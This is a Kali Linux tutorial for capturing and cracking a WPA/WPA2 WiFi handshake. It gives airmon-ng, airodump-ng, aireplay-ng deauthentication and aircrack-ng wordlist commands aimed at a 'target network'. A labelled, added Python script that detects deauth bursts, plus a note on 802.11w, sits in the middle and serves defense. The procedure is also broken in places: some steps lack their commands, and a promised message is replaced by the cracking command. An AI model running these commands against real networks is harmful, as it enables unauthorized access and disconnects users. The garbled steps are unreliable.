Start your Kali Linux virtual machine.
Plug in your wireless adapter (see Wireless Adapters suitable for WiFi pen-test).
Disconnect from all wireless networks.
Enable monitor mode on wireless interface
List wireless interfaces supporting monitor mode
Enable monitor mode
airmon-ng start wlan0
Scan for WiFi networks
Spot your target network in the list and note down its BSSID, channel and ESSID.
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
-c channel to listen on.
--bssid show only networks matching the given BSSID.
-w prefix to use for the dump file.
Inject packets/Capture Handshake
Watch the airodump-ng output and wait for a client to show up. Leave airodump-ng running, open a new terminal window and execute:
aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]
-0 number of deauth packets to send
-a access point router’s BSSID
-c client’s MAC address
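Seen from the defending side, the deauth step above leaves a visible trace: a short burst of deauthentication frames for one access point/client pair. The following is an added example, not part of the original tutorial, that flags such bursts in management-frame records; the record format, the MAC addresses, the window and the threshold are all assumptions constructed for the illustration.

```python
from collections import defaultdict, deque

AP = "02:00:00:aa:aa:01"      # constructed, locally administered MACs
CLIENT = "02:00:00:bb:bb:02"
OTHER = "02:00:00:cc:cc:03"


def build_sample():
    """Constructed records: '<time_s> <subtype> <src> <dst> <bssid>'."""
    lines = [
        f"10.00 beacon {AP} ff:ff:ff:ff:ff:ff {AP}",
        f"12.00 deauth {OTHER} {AP} {AP}",   # one ordinary disconnect
        "garbage line",                       # malformed input is skipped
    ]
    for i in range(12):                       # burst, both directions
        src, dst = (AP, CLIENT) if i % 2 == 0 else (CLIENT, AP)
        lines.append(f"{20 + i * 0.05:.2f} deauth {src} {dst} {AP}")
    return lines


def find_deauth_bursts(lines, window=1.0, threshold=10):
    """Return {(bssid, client): peak count} for pairs that saw at least
    `threshold` deauth frames within `window` seconds (time-ordered input)."""
    recent = defaultdict(deque)   # (bssid, client) -> timestamps in window
    alerts = {}
    for line in lines:
        parts = line.split()
        if len(parts) != 5 or parts[1] != "deauth":
            continue
        try:
            ts = float(parts[0])
        except ValueError:
            continue
        src, dst, bssid = (p.lower() for p in parts[2:])
        client = dst if src == bssid else src   # the non-AP end of the pair
        seen = recent[(bssid, client)]
        seen.append(ts)
        while ts - seen[0] > window:            # drop frames outside window
            seen.popleft()
        if len(seen) >= threshold:
            key = (bssid, client)
            alerts[key] = max(alerts.get(key, 0), len(seen))
    return alerts


if __name__ == "__main__":
    for (bssid, client), count in find_deauth_bursts(build_sample()).items():
        print(f"deauth burst: bssid={bssid} client={client} frames={count}")
```

This check only detects forged deauthentication frames; the mitigation is enabling 802.11w Protected Management Frames on the access point and its clients.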
Within moments you should see this message appear in the airodump-ng screen:
aircrack-ng -a2 -b [router bssid] -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap
-a attack mode, 1 for WEP, 2 for WPA/WPA2
-b access point router’s BSSID
-w wordlist/passwords list
If the password is in the wordlist, then aircrack-ng will show it like this: